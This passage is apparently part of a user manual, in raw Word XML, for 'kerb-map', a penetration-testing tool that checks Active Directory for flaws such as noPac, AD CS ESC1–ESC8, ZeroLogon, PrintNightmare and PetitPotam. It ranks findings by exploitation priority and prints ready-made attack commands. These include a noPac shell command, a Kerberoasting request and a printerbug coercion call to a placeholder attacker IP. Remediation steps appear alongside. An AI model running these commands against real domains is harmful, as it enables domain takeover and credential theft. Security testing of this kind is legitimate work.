          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection is entirely passive — the tool reads two LDAP attributes and compares the domain schema version against the patched baseline (version 88 or higher). If vulnerable, any low-privileged domain user can rename a machine account to match a DC name, request a TGT, rename it back, and obtain a service ticket with Domain Admin privileges embedded in the PAC.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Next step if vulnerable:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_2_AD_CS_Misconfigurations___ESC1_through_ESC8" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 AD CS Misconfigurations — ESC1 through ESC8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory Certificate Services misconfigurations are one of the highest-value findings in modern engagements. The AD CS module performs a passive LDAP audit of all certificate templates and certificate authorities.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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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ESC1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Template has ENROLLEE_SUPPLIES_SUBJECT flag enabled AND a Client Authentication EKU. Any enrollee can request a certificate for any user, including Domain Admins.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ESC2</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Template has the Any Purpose EKU (OID 2.5.29.37.0) or no EKU restrictions. The resulting certificate can be used for any purpose including authentication.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ESC3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Template has the Certificate Request Agent EKU with no issuance policy requirement. Allows enrolling certificates on behalf of other users.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ESC4</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Template ACLs grant write access to low-privileged accounts, allowing an attacker to modify the template to introduce ESC1 or ESC2 conditions.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ESC5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Vulnerable PKI object ACLs on the CA server, RootCA, or NTAuthCertificates.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ESC6</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CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled.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ESC7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CA manager approval bypass via ManageCA or ManageCertificates permissions.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ESC8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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HTTP enrollment endpoint without HTTPS or Extended Protection for Authentication (EPA).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For a full AD CS audit with exploitation paths, certipy is the recommended follow-up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certipy find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10 -vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_3_ZeroLogon___CVE_2020_1472__Aggressive_" w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 ZeroLogon — CVE-2020-1472 [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Netlogon elevation of privilege. An unauthenticated attacker within network reach of a DC can set the DC machine account password to an empty string, authenticate as the DC, and run a DCSync to dump all domain hashes. Requires no credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection uses a two-layer approach: Layer 1 (safe) checks domain functional level as an indicator of patch status. Layer 2 (aggressive) sends a malformed NetrServerAuthenticate3 request with a zeroed credential. A patched DC returns an error immediately; an unpatched DC may accept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2E75B6" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">NOTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The RPC probe in kerb-map is non-destructive. It does NOT set the machine account password. It only tests whether the DC accepts the zeroed credential in the ServerAuthenticate3 handshake.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_4_PrintNightmare___CVE_2021_1675___CVE_2021_34527__Aggressive_" w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 PrintNightmare — CVE-2021-1675 / CVE-2021-34527 [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Print Spooler service running on a Domain Controller allows any authenticated user to coerce the DC to authenticate to an attacker-controlled machine via the MS-RPRN RPC interface. This forced authentication can be relayed to obtain a TGT for the DC machine account or relayed to AD CS for a domain compromise certificate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: The module attempts to bind to the \\pipe\\spoolss named pipe over SMB. If the bind succeeds, the spooler is running and the DC is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: Disable the Print Spooler service on all Domain Controllers. No DC should ever have a print spooler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On the DC:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stop-Service Spooler -Force</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Service Spooler -StartupType Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_5_PetitPotam___CVE_2021_36942__Aggressive_" w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 PetitPotam — CVE-2021-36942 [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The EFS (Encrypting File System) RPC interface can be abused by any unauthenticated attacker to coerce a DC to authenticate to an arbitrary host via NTLM or Kerberos. When AD CS with HTTP enrollment is present in the environment, this creates a full domain compromise path without any credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: Apply KB5005413. Enable Extended Protection for Authentication (EPA) on AD CS IIS endpoints. Enable LDAP signing and channel binding on all DCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_6_MS14_068___CVE_2014_6324" w:id="39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 MS14-068 — CVE-2014-6324</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Affects unpatched Windows Server 2008/2012 domain controllers. Allows any authenticated domain user to forge a PAC (Privilege Attribute Certificate) claiming Domain Admin group membership, then submit it to obtain a golden-ticket equivalent TGT. Detection is based on domain functional level as an indicator only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_7_GPP_Passwords___MS14_025" w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 GPP Passwords — MS14-025</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads Group Policy Preference XML files from the SYSVOL share. If any contain a cpassword attribute, kerb-map decrypts it using the publicly known AES key and reports the plaintext credential. This is a v1.1 addition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_8_Bronze_Bit___CVE_2020_17049" w:id="41"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Bronze Bit — CVE-2020-17049</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries constrained delegation accounts and checks whether the DC has the November 2020 patch for the S4U2Proxy forwardable bit bypass. An unpatched DC allows forging service tickets to any SPN even when the target is marked as not allowing delegation. This is a v1.1 addition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_9_Certifried___CVE_2022_26923" w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9 Certifried — CVE-2022-26923</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks whether computer accounts can enroll in certificate templates that include dNSHostName in the subject. An unpatched environment allows a low-privilege user who can create machine accounts (default quota: 10) to obtain a certificate as a DC and authenticate as that DC. This is a v1.1 addition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_10_LDAP_Signing_Not_Required" w:id="43"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.10 LDAP Signing Not Required</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries the DC’s LDAP rootDSE for signing requirements. If LDAP signing is not required, the domain is vulnerable to NTLM relay attacks targeting LDAP. Scored at 70. This is a v1.1 addition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="6__Scoring___Priority_Engine" w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Scoring &amp; Priority Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The scorer is the most operationally valuable component of kerb-map. After all modules complete, it cross-correlates every finding into a single unified list ranked by exploitation priority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="6_1_How_Findings_Are_Ranked" w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 How Findings Are Ranked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each finding type is assigned a base priority score, then adjusted based on contextual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2800"/>
        <w:gridCol w:w="2160"/>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Finding Type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Base Score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Adjustments</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Severity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CVE — CRITICAL severity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95–98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None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CRITICAL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Unconstrained Delegation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95</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None — always critical</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CRITICAL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Trust Abuse (Forest, no SID filter)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90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CRITICAL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Password spray (no lockout)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85</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None</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CRITICAL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DnsAdmins member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88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None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AS-REP Roast + admin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90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+15 for admin group membership</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CRITICAL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AS-REP Roast (standard)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75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Base score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Certifried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80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Constrained Deleg S4U2Self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80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Only if protocol transition enabled</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Trust Abuse (Bidir, no SID filter)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75</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LDAP Signing Not Required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70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RBCD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70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None</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Weak DC Encryption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65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RC4-only Account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65</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DES Account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60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MEDIUM</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GPP Password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60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MEDIUM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Bronze Bit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60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v1.1 addition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MEDIUM</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SPN Kerberoast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0–100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Calculated by scoring algorithm (Sec 4.1)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Varies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Stale Account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30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Informational</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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="6_2_Next_Step_Generation" w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Next Step Generation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every entry in the priority list includes a pre-filled command to execute the attack. The tool substitutes in the discovered account names and domain information so the output is immediately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Example output for a Kerberoastable account:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GetUserSPNs.py corp.local/jsmith:Password123 -request-user svc_sql -outputfile svc_sql.hash</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Example output for noPac:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</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Example output for unconstrained delegation:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python printerbug.py corp.local/jsmith:pass@WEBSERVER01.corp.local &lt;ATTACKER_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="7__Output___Export" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Output &amp; Export</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="7_1_Terminal_Output" w:id="48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Terminal Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map uses the Rich library to produce structured, colour-coded terminal output. Each module’s results are displayed in their own section, followed by the cross-correlated priority target table and a summary footer that identifies the single best first move.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Output sections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Overview — functional level, password policy snapshot, MachineAccountQuota</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoastable Accounts — account table with crack score, encryption type, and password age</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP Roastable Accounts — accounts with pre-auth disabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos Delegation — unconstrained hosts, constrained accounts, RBCD targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain User Analysis — privileged users, stale accounts, DnsAdmins, LAPS, trusts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption Audit — RC4-only accounts, DES accounts, weak DCs (v1.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
